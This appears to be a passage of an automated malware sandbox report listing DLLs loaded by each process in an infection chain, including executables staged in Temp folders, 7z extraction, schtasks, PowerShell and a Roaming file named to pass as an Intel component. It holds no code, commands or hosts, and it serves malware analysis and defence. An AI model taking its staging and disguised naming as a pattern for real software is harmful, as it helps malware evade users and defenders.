Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\mode.com Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Section loaded: apphelp.dll
